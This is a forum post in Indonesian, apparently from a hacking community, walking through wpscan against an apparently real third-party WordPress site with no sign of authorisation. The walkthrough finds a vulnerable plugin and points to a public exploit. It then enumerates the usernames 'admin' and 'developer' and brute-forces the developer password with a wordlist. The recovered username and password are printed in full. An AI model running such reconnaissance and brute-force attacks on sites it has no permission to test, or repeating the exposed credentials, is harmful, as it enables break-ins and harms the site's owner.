RieqyNS13
Moderator
Jumlah posting : 379
Join date : 2011-01-16
Age : 26
Lokasi : chmod 0655 GetConfig.SQL
 |  Subject: Enumerate wordpress site dengan wpsan.rb  Sun Dec 30, 2012 11:15 pm | |
| Wpscan kanggo linux gak usah kebanyakan bacot gan :dead mungkin sebagian besar member DC udah tw,,jdi yg udah tw enyah aja dri sini,,ane cuma mw share untuk yg blum tw aja :dead 1. buka wpscan.rb ( /pentest/web/wpscan ) 2. ketik wpscan.rb ,,trus enter. biasanya ditanya mw update atau kagak,,klo kagak ente ketik n klo mw update ketik y. [*]klo agan milih y,trus udah selesai updatenya,,biasanyw muncul error kya gini pas buka wpscan.rb - Code:
-
root@bt:/pentest/web/wpscan# ./wpscan.rb -h
[ERROR] Install missing ruby gem. Please see README file or http://code.google.com/p/wpscan/
#<LoadError: no such file to load -- nokogiri> solusinya udah ada di error messagenya gan -_- : - Code:
-
gem install --user-install nokogiri - Code:
-
root@bt:/pentest/web/wpscan# gem install --user-install nokogiri
WARNING: You don't have /root/.gem/ruby/1.9.2/bin in your PATH,
gem executables will not run.
Building native extensions. This could take a while...
Successfully installed nokogiri-1.5.2
1 gem installed
Installing ri documentation for nokogiri-1.5.2...
Installing RDoc documentation for nokogiri-1.5.2... 3. Ketik ./wpscan.rb atau ./wpscan.rb --help - Code:
-
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
Help :
Some values are settable in conf/browser.conf.json :
user-agent, proxy, threads, cache timeout and request timeout
--update Update to the latest revision
--url | -u <target url> The WordPress URL/domain to scan.
--force | -f Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)] Enumeration.
option :
u usernames from id 1 to 10
u[10-20] usernames from id 10 to 20 (you must write [] chars)
p plugins
p! only vulnerable plugins
t timthumbs
Multiple values are allowed : '-e tp' will enumerate timthumbs and plugins
If no option is supplied, the default is 'tup!'
--follow-redirection If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--wp-content-dir <wp content dir> WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed
--wp-plugins-dir <wp plugins dir> Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
--proxy Supply a proxy in the format host:port (will override the one from conf/browser.conf.json)
--wordlist | -w <wordlist> Supply a wordlist for the password bruter and do the brute.
--threads | -t <number of threads> The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)
--username | -U <username> Only brute force the supplied username.
--help | -h This help screen.
--verbose | -v Verbose output.
. sampe sini agan bisa nerusin sendiri kan ? :ngamuk:nothing Klo ada yg belum tw,,ya udah ane ksih tutor sekalian. bgi yg udah tw ngapain ente kemari :ngakak 4. Masukin url dan pilih option lainnya, misalkan ane mw liat2 pluginnya yg vuln : - Code:
-
./wpscan.rb --url www.productbestbuy.com --enumerate p! - Code:
-
root@bt:/pentest/web/wpscan# ./wpscan.rb --url www.productbestbuy.com --enumerate p!
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 21:54:53 2012
[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator
[+] Enumerating plugins from passive detection ... 2 found :
| Name: amazon-link
| Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/
| Name: jetpack
| Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/
[+] Enumerating installed plugins (only vulnerable ones) ...
Checking for 253 total plugins... 100% complete.
[+] We found 1 plugins:
| Name: jetpack
| Location: http://www.productbestbuy.com/wp-content/plugins/jetpack/
| Directory listing enabled? Yes.
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/
[+] Finished at Sun Dec 30 21:56:44 2012
tu gan, nemu 1 plugin vuln,,malah udah dikasih exploit nya :tepokjidat 5. skarang coba ane cari username nya : - Code:
-
./wpscan.rb --url www.productbestbuy.com --enumerate u - Code:
-
./wpscan.rb --url www.productbestbuy.com --enumerate u
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 22:22:31 2012
[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator
[+] Enumerating plugins from passive detection ... 2 found :
| Name: amazon-link
| Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/
| Name: jetpack
| Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/
[+] Enumerating usernames ...
We found the following 2 username/s :
admin
developer
ada 2 user gan, admin ama developer wpscan versi bru aneh,,wong cuma nyari username aja,,pluginnya ikut discan juga :stress (buang2 waktu aja) 6. skarang nyari password nya pke brute force :kartumerah, harus sediain wordlist.lst bejibun nih berarti :prustasi. Wordist ane letaknya di /root/Desktop/wordlist.lst - Code:
-
./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst - Code:
-
./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 22:36:41 2012
[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator
[+] Enumerating plugins from passive detection ...
2 found :
| Name: amazon-link
| Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/
| Name: jetpack
| Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/
[+] Starting the password brute forcer
Brute forcing user 'developer' with 12 passwords... 58% complete.
[SUCCESS] Username : developer Password : cisadane123456
[+] Finished at Sun Dec 30 22:38:18 2012
nemu tuh gan - Code:
-
Username : developer Password : cisadane123456 pic: - pic:
penulis : RieqyNS13 wpscan developer : ethicalhacke3r kata developernya,,wpscan.rb gak support untuk windows walapun udah di install ruby(pengalaman),,jdi coba aga pke cygwin aja :ngakak agar lebih tw,,agan2 liat README nya aja -_- - Code:
-
https://github.com/wpscanteam/wpscan/blob/master/README | |
|
